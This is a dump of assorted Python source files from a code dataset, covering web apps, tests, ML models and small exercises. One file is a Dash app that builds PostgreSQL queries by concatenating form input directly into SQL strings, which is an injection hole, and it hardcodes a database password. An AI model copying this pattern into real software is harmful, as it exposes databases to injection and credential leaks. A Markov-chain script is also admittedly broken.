Types/Elements/count_bits.py","file_name":"count_bits.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"490633556","text":"from . import db\n\n\n\nclass Autore(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n nome = db.Column(db.String(20), nullable=False)\n biografia = db.Column(db.Text)\n stile = db.Column(db.String(50))\n periodo = db.Column(db.String(100))\n\n\n immagini = db.relationship('ImmagineAutore', backref='autore', lazy='dynamic',\n cascade='all')\n\n\n opere = db.relationship('Opera', backref='autore', lazy='dynamic', \n cascade='all')\n\n\n def __init__(self, nome, biografia='', stile='', periodo=''):\n self.nome = nome\n self.biografia = biografia\n self.stile = stile\n self.periodo = periodo\n\n\n\n def __repr__(self):\n return '''\n id: {}\n nome: {}\n biografia: {}\n stile: {}\n periodo: {}\n '''.format(self.id, \n self.nome,\n self.biografia,\n self.stile,\n self.periodo)\n\n\n\n def light_serialize(self):\n return {\n 'id': self.id,\n 'nome': self.nome,\n 'stile': self.stile,\n 'periodo': self.periodo\n }\n\n\n\n def serialize(self):\n r = self.light_serialize()\n r['biografia'] = self.biografia\n r['immagini'] = [i.light_serialize() for i in self.immagini]\n r['opere'] = [ o.light_serialize() for o in self.opere ]\n return r\n\n\n\n\nclass ImmagineAutore(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n filename = db.Column(db.String, nullable=False)\n autore_id = db.Column(db.Integer, db.ForeignKey('autore.id'), nullable=False)\n ## autore da backref \n\n def __init__(self, filename, autore_id):\n self.filename = filename\n self.autore_id = autore_id\n\n\n def __repr__(self):\n return '''\n id: {}\n filename: {}\n autore_id: {}\n '''.format(self.id, \n self.filename, \n self.autore_id)\n\n\n\n def light_serialize(self):\n return {\n 'id': self.id,\n 'filename': self.filename,\n 'autore_id': self.autore_id\n }\n\n\n def serialize(self):\n r = self.light_serialize()\n r['autore'] = self.autore.light_serialize()\n return r\n\n","sub_path":"backend/app/model/autore.py","file_name":"autore.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"41022032","text":"from willow.willow import *\n\ndef session(me):\n if me == 0:\n add(open(\"prisoner.html\"))\n msg0 = take({\"client\": me})\n choice_0 = msg0[\"id\"]\n put({\"tag\":\"pl_0\",\"choice_0\":choice_0})\n show(\"#wait\")\n add(choice_0, \"#pchoice\")\n msg0 = take({\"tag\": \"pl_1\"})\n\n if choice_0 == msg0[\"choice_1\"] == \"confess\":\n penal = \"7\"\n elif choice_0 == \"confess\" and msg0[\"choice_1\"] == \"silence\":\n penal = \"1\"\n elif choice_0 == \"silence\" and msg0[\"choice_1\"] == \"confess\":\n penal = \"10\"\n elif choice_0 == msg0[\"choice_1\"] == \"silence\":\n penal = \"3\"\n\n show(\"#sentence\")\n add(penal, \"#penal\")\n\n elif me == 1:\n add(open(\"prisoner.html\"))\n msg1 = take({\"client\": me})\n choice_1 = msg1[\"id\"]\n put({\"tag\":\"pl_1\",\"choice_1\":choice_1})\n show(\"#wait\")\n add(choice_1, \"#pchoice\")\n msg1 = take({\"tag\": \"pl_0\"})\n\n if msg1[\"choice_0\"] == choice_1 == \"confess\":\n penal = \"7\"\n elif msg1[\"choice_0\"] == \"confess\" and choice_1 == \"silence\":\n penal = \"10\"\n elif msg1[\"choice_0\"] == \"silence\" and choice_1 == \"confess\":\n penal = \"1\"\n elif msg1[\"choice_0\"] == choice_1 == \"silence\":\n penal = \"3\"\n \n show(\"#sentence\")\n add(penal, \"#penal\")\n\nrun(session)","sub_path":"prisonerver2.py","file_name":"prisonerver2.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"189687963","text":"\"\"\"Datasource.py: Loads data from ontology.\"\"\"\r\n__author__ = \"Mario Sandoval\"\r\n__copyright__ = \"Copyright 2018\"\r\n__license__ = \"The University of Manchester\"\r\n__version__ = \"3.1\"\r\n__maintainer__ = \"Mario Sandoval\"\r\n__email__ = \"mario.sandovalolive@manchester.ac.uk\"\r\n__status__ = \"Development\"\r\n\r\nimport os.path, sys\r\nfilepath = os.path.abspath(os.path.join(\"/Mario/3.1/LISU\", os.pardir))\r\nsys.path.insert(0, filepath + \"/LISU\")\r\nfrom rdflib import *\r\n\r\n\r\nCEXPLS = []\r\nCNOPLS = []\r\nEXPERT = \"Expert\"\r\nNOVICE = \"Novice\"\r\nONTURL = \"https://personalpages.manchester.ac.uk/staff/mario.sandovalolive/ontology/idoo.owl\"\r\n\r\nclass Controller:\r\n def __init__(self, name, level):\r\n self.name = name\r\n self.level = level\r\n\r\ndef FindOntology(qstr):\r\n return(\"\"\"\r\n PREFIX rdf: \r\n PREFIX owl: \r\n PREFIX rdfs: \r\n PREFIX xsd: \r\n\r\n PREFIX lisu: \r\n\r\n SELECT ?controller ?level ?name\r\n WHERE\r\n {\r\n ?controller lisu:productName ?name .\r\n ?controller lisu:isAppropriate ?level .\r\n ?level rdf:type lisu:%s .\r\n }\r\n GROUP BY ?controller ?level ?name\r\n \"\"\" % qstr)\r\n\r\n# Expert users can do clip planes and more complex\r\ndef GetExpertsControllers():\r\n global CEXPLS\r\n g = Graph()\r\n g.parse(ONTURL)\r\n q = g.query(FindOntology(EXPERT))\r\n for row in q:\r\n inputDevice = Controller(str(row.name).strip(), str(row.level))\r\n CEXPLS.append(inputDevice)\r\n return CEXPLS\r\n\r\n# Novice users can only do rotation camera and movement of bricks\r\ndef GetNoviceControllers():\r\n global CNOPLS\r\n g = Graph()\r\n g.parse(ONTURL)\r\n q = g.query(FindOntology(NOVICE))\r\n for row in q:\r\n inputDevice = Controller(str(row.name).strip(), str(row.level))\r\n CNOPLS.append(inputDevice)\r\n return CNOPLS\r\n","sub_path":"Data/DataSource.py","file_name":"DataSource.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"147452347","text":"import sys\nimport dash\nimport dash_table\nimport pandas as pd\nimport dash_core_components as dcc\nfrom dash.dependencies import Output, Input, State\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport psycopg2\nimport pandas.io.sql as sqlio\n\nexternal_stylesheets=[dbc.themes.BOOTSTRAP]\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\napp.config.suppress_callback_exceptions = True\n\n\napp.layout = html.Div(\n [ \n html.I(\"Lutfen sorgu yapmak istediginiz degerleri giriniz!\"),\n html.Br(),\n dcc.Input(id=\"input1\", type=\"text\", placeholder=\"Model\"),\n dcc.Input(id=\"input2\", type=\"text\", placeholder=\"Yil\", debounce=True),\n dcc.Input(id=\"input3\", type=\"text\", placeholder=\"Renk\"),\n dcc.Input(id=\"input4\", type=\"text\", placeholder=\"Kilometre\"),\n dcc.Input(id=\"input5\", type=\"text\", placeholder=\"Fiyat\"),\n dcc.Input(id=\"input6\", type=\"text\", placeholder=\"il\"),\n html.Button('Bring data', id='bring-data-button', n_clicks=0),\n html.Br(),\n html.Br(),\n html.Div(id='place1')\n ]\n)\n\n# Connection parameters, yours will be different\nparam_dic = {\n \"host\" : \"localhost\",\n \"database\" : \"Arabalar\",\n \"user\" : \"postgres\",\n \"password\" : \"pg05330477\"\n}\n\ndef connect(params_dic):\n \"\"\" Connect to the PostgreSQL database server \"\"\"\n conn = None\n try:\n # connect to the PostgreSQL server\n print('Connecting to the PostgreSQL database...')\n conn = psycopg2.connect(**params_dic)\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n sys.exit(1) \n print(\"Connection successful\")\n return conn\n\n\n# GET DATAFRAME\n# select cls, avg(math) from tbl_not group by cls order by cls\ndef postgresql_to_dataframe(conn, select_query, column_names):\n \"\"\"\n Tranform a SELECT query into a pandas dataframe\n \"\"\"\n cursor = conn.cursor()\n try:\n cursor.execute(select_query)\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: %s\" % error)\n cursor.close()\n return 1\n \n # Naturally we get a list of tupples\n tupples = cursor.fetchall()\n cursor.close()\n \n # We just need to turn it into a pandas dataframe\n df = pd.DataFrame(tupples, columns=column_names)\n return df\n\n\n@app.callback(\n [Output(component_id='place1', component_property='children')],\n [Input(component_id='bring-data-button', component_property='n_clicks')],\n [State(component_id=\"input1\", component_property='value'),\n State(component_id=\"input2\", component_property='value'),\n State(component_id=\"input3\", component_property='value'),\n State(component_id=\"input4\", component_property='value'),\n State(component_id=\"input5\", component_property='value'),\n State(component_id=\"input6\", component_property='value')]\n)\ndef save(n,v1,v2,v3,v4,v5,v6):\n w = False\n q = \"SELECT model, yil, renk, kilometre, fiyat, il FROM cars\"\n t = \"SELECT model, yil, renk, kilometre, fiyat, il FROM cars WHERE\"\n if v1:\n t = t + \" model LIKE '%\"+ v1 +\"%'\"\n w = True\n if v2:\n if w:\n t = t + \" AND\"\n t = t + \" yil LIKE '%\"+ v2 +\"%'\"\n w = True\n if v3:\n if w:\n t = t + \" AND\"\n t = t + \" renk LIKE '%\"+ v3 +\"%'\"\n w = True\n if v4:\n if w:\n t = t + \" AND\"\n t = t + \" kilometre LIKE '%\"+ v4 +\"%'\"\n w = True\n if v5:\n if w:\n t = t + \" AND\"\n t = t + \" fiyat LIKE '%\"+ v5 +\"%'\"\n w = True\n if v6:\n if w:\n t = t + \" AND\"\n t = t + \" il LIKE '%\"+ v6 +\"%'\"\n w = True \n \n if v1 or v2 or v3 or v4 or v5 or v6:\n q = t\n \n conn = connect(param_dic)\n df = postgresql_to_dataframe(conn, q, (\"Model\", \"Yil\", \"Renk\", \"Kilometre\", \"Fiyat\", \"Il\"))\n\n\n return [dash_table.DataTable(\n id='table_ratio',\n data=df.to_dict('records'),\n columns=[{'id': c, 'name': c} for c in df.columns],\n style_cell={'textAlign': 'center', 'width': '30px', 'minWidth': '10px', 'maxWidth': '50px'},\n fixed_rows={'headers': True, 'data': 0},\n style_header={'fontWeight': 'bold'},\n style_table={'overflowX': 'auto'},\n editable=True)]\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n\n\n","sub_path":"Arabam/auto/auto/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"59447227","text":"import sys\n\n\nclass Node:\n def __init__(self, key, left, right):\n self.key = key\n self.left = left\n self.right = right\n\n\ndef is_BST(node: Node, left_border=None, right_border=None):\n if not node:\n return True\n\n if left_border and node.key < left_border:\n return False\n if right_border and node.key >= right_border:\n return False\n\n return is_BST(node.left, left_border, node.key) and is_BST(node.right, node.key, right_border)\n\n\nif __name__ == '__main__':\n sys.setrecursionlimit(1_000_000)\n\n n = int(input())\n nodes = [Node(*[int(i) for i in input().split()]) for _ in range(n)]\n for node in nodes:\n node.left = None if node.left == -1 else nodes[node.left]\n node.right = None if node.right == -1 else nodes[node.right]\n\n root = nodes[0] if len(nodes) > 0 else None\n print('CORRECT' if is_BST(root) else 'INCORRECT')\n","sub_path":"src/search trees/check_if_binary_tree_is_BST_2.py","file_name":"check_if_binary_tree_is_BST_2.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"456169031","text":"from django import forms\nfrom .models import Pedido\n\n\nclass PedidoForm(forms.ModelForm):\n\n class Meta:\n model = Pedido\n fields='__all__'\n\n def __init__(self, *args, **kwargs):\n super(PedidoForm, self).__init__(*args, **kwargs)\n for field in iter(self.fields):\n\n self.fields[field].widget.attrs.update({\n 'class': 'form-control border-primary'\n })\n\n","sub_path":"pedidos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"614797593","text":"#-------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#--------------------------------------------------------------------------\n\nimport logging\nimport sys\nimport os\nimport pytest\nimport time\nfrom datetime import datetime, timedelta\n\nfrom azure.servicebus import ServiceBusClient, TopicClient, SubscriptionClient\nfrom azure.servicebus.common.message import Message, PeekMessage\nfrom azure.servicebus.common.constants import ReceiveSettleMode\nfrom azure.servicebus.common.errors import ServiceBusError\n\n\ndef get_logger(level):\n azure_logger = logging.getLogger(\"azure\")\n if not azure_logger.handlers:\n azure_logger.setLevel(level)\n handler = logging.StreamHandler(stream=sys.stdout)\n handler.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))\n azure_logger.addHandler(handler)\n\n uamqp_logger = logging.getLogger(\"uamqp\")\n if not uamqp_logger.handlers:\n uamqp_logger.setLevel(logging.INFO)\n uamqp_logger.addHandler(handler)\n return azure_logger\n\n_logger = get_logger(logging.DEBUG)\n\n@pytest.mark.liveTest\ndef test_subscription_by_subscription_client_conn_str_receive_basic(live_servicebus_config, standard_subscription):\n topic_name, subscription_name = standard_subscription\n topic_client = TopicClient.from_connection_string(live_servicebus_config['conn_str'], name=topic_name, debug=False)\n with topic_client.get_sender() as sender:\n message = Message(b\"Sample topic message\")\n sender.send(message)\n\n sub_client = SubscriptionClient.from_connection_string(live_servicebus_config['conn_str'], subscription_name, topic=topic_name, debug=False)\n with sub_client.get_receiver(idle_timeout=5) as receiver:\n count = 0\n for message in receiver:\n count += 1\n message.complete()\n assert count == 1\n\n@pytest.mark.liveTest\ndef test_subscription_by_servicebus_client_conn_str_send_basic(live_servicebus_config, standard_subscription):\n topic_name, subscription_name = standard_subscription\n client = ServiceBusClient(\n service_namespace=live_servicebus_config['hostname'],\n shared_access_key_name=live_servicebus_config['key_name'],\n shared_access_key_value=live_servicebus_config['access_key'],\n debug=False)\n\n topic_client = client.get_topic(topic_name)\n sub_client = client.get_subscription(topic_name, subscription_name)\n\n with topic_client.get_sender() as sender:\n message = Message(b\"Sample topic message\")\n sender.send(message)\n\n with sub_client.get_receiver(idle_timeout=5) as receiver:\n count = 0\n for message in receiver:\n count += 1\n message.complete()\n assert count == 1\n\n@pytest.mark.liveTest\ndef test_subscription_by_servicebus_client_list_subscriptions(live_servicebus_config, standard_subscription):\n topic_name, subscription_name = standard_subscription\n client = ServiceBusClient(\n service_namespace=live_servicebus_config['hostname'],\n shared_access_key_name=live_servicebus_config['key_name'],\n shared_access_key_value=live_servicebus_config['access_key'],\n debug=False)\n\n subs = client.list_subscriptions(topic_name)\n assert len(subs) >= 1\n assert all(isinstance(s, SubscriptionClient) for s in subs)\n assert subs[0].name == subscription_name\n assert subs[0].topic_name == topic_name\n\n@pytest.mark.liveTest\ndef test_subscription_by_subscription_client_conn_str_send_fail(live_servicebus_config, standard_subscription):\n topic_name, subscription_name = standard_subscription\n\n sub_client = SubscriptionClient.from_connection_string(live_servicebus_config['conn_str'], subscription_name, topic=topic_name, debug=False)\n with pytest.raises(AttributeError):\n sub_client.get_sender()\n","sub_path":"sdk/servicebus/azure-servicebus/tests/test_subscriptions.py","file_name":"test_subscriptions.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"564576489","text":"\nimport json\nfrom xml.etree import ElementTree\n\nfrom lithoxyl import Logger, AggregateSink\nfrom lithoxyl.utils import wrap_all, unwrap_all\n\n\ndef test_wrap_all_json():\n agg_sink = AggregateSink()\n log = Logger('wrapper_log', sinks=[agg_sink])\n\n wrap_all(log, 'info', json)\n\n json.loads('{}')\n\n assert agg_sink.begin_events[0].name == 'json.loads'\n\n unwrap_all(json)\n\n json.loads('{}')\n\n assert len(agg_sink.begin_events) == 3\n\n return\n\n\ndef test_wrap_all_element_tree():\n\tlog = Logger('test', sinks=[])\n\n\t# test old-style class wrapping / unwrapping\n\twrap_all(log, target=ElementTree)\n\tunwrap_all(ElementTree)\n\n","sub_path":"lithoxyl/tests/test_wrap_all.py","file_name":"test_wrap_all.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"126007010","text":"import os\nfrom csv import *\nimport commands\n\ndata = reader(open('threads.txt', 'r'), delimiter=\" \")\ndata2=reader(open('params.txt', 'r'), delimiter=\" \")\nthreads, params = [], []\nthread_n=0\nparam_n=0\n\ntheFile = open(\"params.txt\", \"r\")\nparams = []\nfor val in theFile.read().split():\n params.append(int(val))\ntheFile.close()\n\n# My input read assumes that every.entry in params and threads is in seperate lines \n# otherwise we have to change the input format\nfor row in data:\n threads.append(int(row[0]))\n thread_n+=1 \n#for row in data2:\n# params.append(int(row[0]))\n# param_n+=1 \n\nth=1\nt1=open(\"t1_full.txt\",\"w\")\nfor pa in params:\n i=0\n while i<100 :\n op=commands.getoutput(\"./app \"+str(pa) +\" \"+ str(th))\n st=op[13:]\n a,b=st.split(\" \")\n \n\n t1.write(\"\"+str(pa)+\" \"+a+\"\\n\")\n i+=1\n \nt1.close()\n\nth=2\nt2=open(\"t2_full.txt\",\"w\")\nfor pa in params:\n i=0\n while i<100 :\n op=commands.getoutput(\"./app \"+str(pa) +\" \"+ str(th))\n st=op[13:]\n a,b=st.split(\" \")\n \n t2.write(\"\"+str(pa)+\" \"+a+\"\\n\")\n i+=1\n \nt2.close()\n\nth=4\nt4=open(\"t4_full.txt\",\"w\")\nfor pa in params:\n i=0\n while i<100 :\n op=commands.getoutput(\"./app \"+str(pa) +\" \"+ str(th))\n st=op[13:]\n a,b=st.split(\" \")\n \n t4.write(\"\"+str(pa)+\" \"+a+\"\\n\")\n i+=1\n \nt4.close()\n\nth=8\nt8=open(\"t8_full.txt\",\"w\")\nfor pa in params:\n i=0\n while i<100 :\n op=commands.getoutput(\"./app \"+str(pa) +\" \"+ str(th))\n st=op[13:]\n a,b=st.split(\" \")\n \n t8.write(\"\"+str(pa)+\" \"+a+\"\\n\")\n i+=1\n \nt8.close()\n\nth=16\nt16=open(\"t16_full.txt\",\"w\")\nfor pa in params:\n i=0\n while i<100 :\n op=commands.getoutput(\"./app \"+str(pa) +\" \"+ str(th))\n st=op[13:]\n a,b=st.split(\" \")\n \n t16.write(\"\"+str(pa)+\" \"+a+\"\\n\")\n i+=1\n \nt16.close()\n\n","sub_path":"a8/160149/run1.py","file_name":"run1.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"17514007","text":"import sys\n\ndef main():\n\tnums = [int(line.strip()) for line in sys.stdin]\n\tfor n in nums:\n\t\tprint(isPerfect(n))\n\ndef sumFac(n):\n\tif n <= 1:\n\t\treturn 0\n\tsum = 1\n\t#print(n)\n\tfor i in range(2, n//2+1):\n\t\tif n%i==0:\n\t\t\t#print(\"{:>4}\".format(i))\n\t\t\tsum = sum + i\n\treturn sum\n\t\ndef isPerfect(n):\n\treturn n == sumFac(n)\n\t\nif __name__ == \"__main__\":\n\tmain()","sub_path":"62/perfect_62.py","file_name":"perfect_62.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"470874748","text":"\"\"\"\n\tPlease feel free to use the code without citing or crediting the author(s) mentioned below. Cheers to science :-)\n\tI'd be happy to hear from you about how to improve this code, and as to how the code may have been useful to you.\n\t\n\tAuthor: Vipin P. Veetil\n\tContact: vipin.veetil@gmail.com\n\t\n\tPaper title: Network Origins of Coordination\n\tPaper URL: http://papers.ssrn.com/sol3/papers.cfm?abstract_id=2621852\n\t\n\tLanguage: Python\n\t\n\tModule name: main\n\"\"\"\n\n\nfrom __future__ import division\nimport parameters\nimport agents\nimport random\nimport networkx as nx\nimport sys\nimport numpy as np\nimport scipy.stats\nimport csv\nimport matplotlib.pyplot as plt\n\nclass Model(object):\n\tdef __init__(self):\n\t\tself.agents_list = []\n\t\tself.number_of_states = parameters.number_of_states\n\t\tself.states_list = range(self.number_of_states)\n\t\tself.number_of_agents = parameters.number_of_agents\n\t\tself.time_steps = parameters.time_steps\n\t\tself.measure_system_states_time_interval = parameters.measure_system_states_time_interval\n\t\tself.mean_degree = parameters.mean_degree\n\t\tself.number_of_games = parameters.number_of_games\n\t\tself.epsilon_convergence = 1 - parameters.epsilon\n\t\tself.proportion_agents_activated = parameters.proportion_agents_activated\n\t\tself.number_of_agents_activated = int(self.proportion_agents_activated * self.number_of_agents)\n\t\tself.activated_agents = []\n\t\tself.states_dynamics = dict((state, []) for state in range(self.number_of_states))\n\t\tself.converged = False\n\t\tself.convergence_sequence = []\n\t\tself.time_steps_to_convergence = None\n\t\tself.number_of_non_convergences = 0\n\t\tself.agents_network = []\n\t\tself.network_topology = parameters.network_topology\n\t\tself.watts_strogatz_rewiring_probability = parameters.watts_strogatz_rewiring_probability\n\n\n\tdef create_agents_list(self):\n\t\t\"\"\" create a list of agents \"\"\"\n\t\tself.agents_list = [agents.Agent() for count in xrange(self.number_of_agents)]\n\n\tdef assign_attributes(self):\n\t\t\"\"\" each agent is initialized with a random state \"\"\"\n\t\tfor agent in self.agents_list:\n\t\t\tagent.number_of_states = self.number_of_states\n\t\t\tagent.state = random.choice(self.states_list)\n\n\tdef create_network(self):\n\t\tif self.network_topology == \"small-world\":\n\t\t\tG = nx.watts_strogatz_graph(self.number_of_agents, self.mean_degree, self.watts_strogatz_rewiring_probability)\n\t\telif self.network_topology == \"scale-free\":\n\t\t\tG = nx.barabasi_albert_graph(self.number_of_agents, int(self.mean_degree/2))\n\t\telif self.network_topology == \"ring\":\n\t\t\tG = nx.watts_strogatz_graph(self.number_of_agents, self.mean_degree, 0)\n\t\telif self.network_topology == \"random\":\n\t\t\tG = nx.watts_strogatz_graph(self.number_of_agents, self.mean_degree, 1)\n\n\t\tmapping = dict(enumerate(self.agents_list))\n\t\tself.agents_network = nx.relabel_nodes(G, mapping)\n\n\n\tdef sample_agents(self):\n\t\tself.activated_agents = random.sample(self.agents_list, self.number_of_agents_activated)\n\n\tdef collect_neighbor_states(self):\n\t\t\"\"\" each activated agent collected information about the states of its neighbors \"\"\"\n\t\tfor agent in self.activated_agents:\n\t\t\tneighbors_states = [neighbor.state for neighbor in self.agents_network.neighbors(agent)]\n\t\t\tagent.update_neighbors_states(neighbors_states)\n\n\tdef agents_update_state(self):\n\t\t\"\"\" each agent updates its state \"\"\"\n\t\tfor agent in self.activated_agents:\n\t\t\tagent.update_state()\n\n\tdef return_system_convergence(self):\n\t\tstates = np.zeros(self.number_of_states, dtype = int)\n\t\tfor agent in self.agents_list:\n\t\t\tstates[agent.state] += 1\n\t\tstates = states / self.number_of_agents\n\t\treturn states.max()\n\n\tdef update_convergence_sequence(self):\n\t\ta = self.return_system_convergence()\n\t\tself.convergence_sequence.append(a)\n\n\tdef is_converged(self):\n\t\treturn self.return_system_convergence() > self.epsilon_convergence\n\n\tdef update_states_dynamics(self):\n\t\tstates = np.zeros(self.number_of_states, dtype = int)\n\t\tfor agent in self.agents_list:\n\t\t\tstates[agent.state] += 1\n\t\tstates = states / self.number_of_agents\n\n\t\tfor state in range(self.number_of_states):\n\t\t\tself.states_dynamics[state].append(states[state])\n\n\tdef one_time_step(self):\n\t\tself.sample_agents()\n\t\tself.collect_neighbor_states()\n\t\tself.agents_update_state()\n\n\tdef game(self):\n\t\tself.create_agents_list()\n\t\tself.assign_attributes()\n\t\tself.create_network()\n\t\tfor time in range(self.time_steps):\n\t\t\tself.one_time_step()\n\t\t\tif time % self.measure_system_states_time_interval == 0:\n\t\t\t\t#self.update_convergence_sequence()\n\t\t\t\t#self.update_states_dynamics()\n\t\t\t\tif self.is_converged():\n\t\t\t\t\tself.time_steps_to_convergence = time\n\t\t\t\t\treturn\n\t\t\t\t\t\"\"\" once the system has converged exit the game \"\"\"\n\t\tself.number_of_non_convergences += 1\n\n\n\n\"\"\"\nplt.plot(model_instance.states_dynamics[0])\nplt.plot(model_instance.states_dynamics[1])\nplt.plot(model_instance.states_dynamics[2])\nplt.xlabel(\"Time steps\", fontsize = 18)\nplt.ylabel(\"Proportion of agents in each state\", fontsize = 18)\nplt.title(\"Scale-free network transient dynamics: 10,000 agents, 3 states\",fontsize = 20)\nplt.grid()\nplt.show()\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"650917039","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'news'\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^art/(?P[-\\w]+).html', views.article_view, name='news_view'),\n url(r'^gnr/(?P[-\\w]+).html', views.genre_detail, name='gnre_view'),\n]","sub_path":"news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"411265415","text":"# @Time : 2020/11/5\n# @Author : Junyi Li, Gaole He\n# @Email : lijunyi@ruc.edu.cn\n\n# UPDATE:\n# @Time : 2021/1/2\n# @Author : Tianyi Tang\n# @Email : steventang@ruc.edu.cn\n\nr\"\"\"\nRNN\n################################################\n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom textbox.model.abstract_generator import UnconditionalGenerator\nfrom textbox.module.Decoder.rnn_decoder import BasicRNNDecoder\nfrom textbox.model.init import xavier_normal_initialization\n\n\nclass RNN(UnconditionalGenerator):\n r\"\"\" Basic Recurrent Neural Network for Maximum Likelihood Estimation.\n \"\"\"\n\n def __init__(self, config, dataset):\n super(RNN, self).__init__(config, dataset)\n\n # load parameters info\n self.embedding_size = config['embedding_size']\n self.hidden_size = config['hidden_size']\n self.num_dec_layers = config['num_dec_layers']\n self.rnn_type = config['rnn_type']\n self.dropout_ratio = config['dropout_ratio']\n self.eval_generate_num = config['eval_generate_num']\n self.max_length = config['max_seq_length']\n\n self.padding_token_idx = dataset.padding_token_idx\n self.sos_token_idx = dataset.sos_token_idx\n self.eos_token_idx = dataset.eos_token_idx\n\n # define layers and loss\n self.token_embedder = nn.Embedding(self.vocab_size, self.embedding_size, padding_idx=self.padding_token_idx)\n\n self.decoder = BasicRNNDecoder(self.embedding_size, self.hidden_size, self.num_dec_layers,\n self.rnn_type, self.dropout_ratio)\n\n self.dropout = nn.Dropout(self.dropout_ratio)\n self.vocab_linear = nn.Linear(self.hidden_size, self.vocab_size)\n\n self.loss = nn.CrossEntropyLoss(ignore_index=self.padding_token_idx, reduction='none')\n\n # parameters initialization\n self.apply(xavier_normal_initialization)\n\n def generate(self, eval_data):\n generate_corpus = []\n idx2token = eval_data.idx2token\n for _ in range(self.eval_generate_num):\n hidden_states = torch.zeros(self.num_dec_layers, 1, self.hidden_size).to(self.device)\n generate_tokens = []\n input_seq = torch.LongTensor([[self.sos_token_idx]]).to(self.device)\n for gen_idx in range(self.max_length):\n decoder_input = self.token_embedder(input_seq)\n outputs, hidden_states = self.decoder(decoder_input, hidden_states)\n token_logits = self.vocab_linear(outputs)\n token_probs = F.softmax(token_logits, dim=-1).squeeze()\n token_idx = torch.multinomial(token_probs, 1)[0].item()\n\n if token_idx == self.eos_token_idx:\n break\n else:\n generate_tokens.append(idx2token[token_idx])\n input_seq = torch.LongTensor([[token_idx]]).to(self.device)\n generate_corpus.append(generate_tokens)\n return generate_corpus\n\n def calculate_loss(self, corpus, epoch_idx=-1, nll_test=False):\n input_text = corpus['target_idx'][:, :-1]\n target_text = corpus['target_idx'][:, 1:]\n\n input_embeddings = self.dropout(self.token_embedder(input_text))\n outputs, hidden_states = self.decoder(input_embeddings)\n\n token_logits = self.vocab_linear(outputs)\n token_logits = token_logits.view(-1, token_logits.size(-1))\n\n loss = self.loss(token_logits, target_text.contiguous().view(-1)).reshape_as(target_text)\n if (nll_test):\n loss = loss.sum(dim = 1)\n else:\n length = corpus['target_length'] - 1\n loss = loss.sum(dim = 1) / length.float()\n return loss.mean()\n \n def calculate_nll_test(self, corpus, epoch_idx):\n return self.calculate_loss(corpus, epoch_idx, nll_test=True)\n","sub_path":"textbox/model/LM/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"329282373","text":"print('\\n')\nprint('\\n')\nprint('˚'*75)\nimport random\n\n# Read in all the words in one go\n# with open(\"applications/markov/input.txt\") as f:\nwith open(\"input.txt\") as f:\n words = f.read()\n\n# Get just the words\nsplit_words = words.split()\n# print(split_words) # A single big list of all the words\n\ndataset = {}\n\n# Put all the words into dataset\nfor i in range(len(split_words)-1):\n word = split_words[i]\n next_word = split_words[i + 1]\n\n # If it doesn't already exist, add it and the next word\n if word not in dataset:\n dataset[word]=[next_word]\n\n # If it does already exist, append the next word\n else:\n dataset[word].append(next_word)\n\n # A list for the sentence starting words\n startwords = []\n for key in dataset.keys():\n if key[0].isupper() or len(key) > 1 and key[1].isupper():\n startwords.append(key)\n word = random.choice(startwords)\n\n # Sentence construction\n stopped = False\n stop_signs = \"?.!\"\n\n while not stopped:\n # A startwords word\n print(word, end=' ')\n\n # If it's a stop word, stop\n if word[-1] in stop_signs or len(word) > 1 and word[-2] in stop_signs:\n stopped = True\n\n # Choose a following word\n following_words = dataset[word]\n\n word = random.choice(following_words)\n\n# I'm not sure why it's not working, I follow the lecture exactly as far as I could tell. \n# https://youtu.be/j0bxDg0PXRM?t=306\n\n# When he runs it 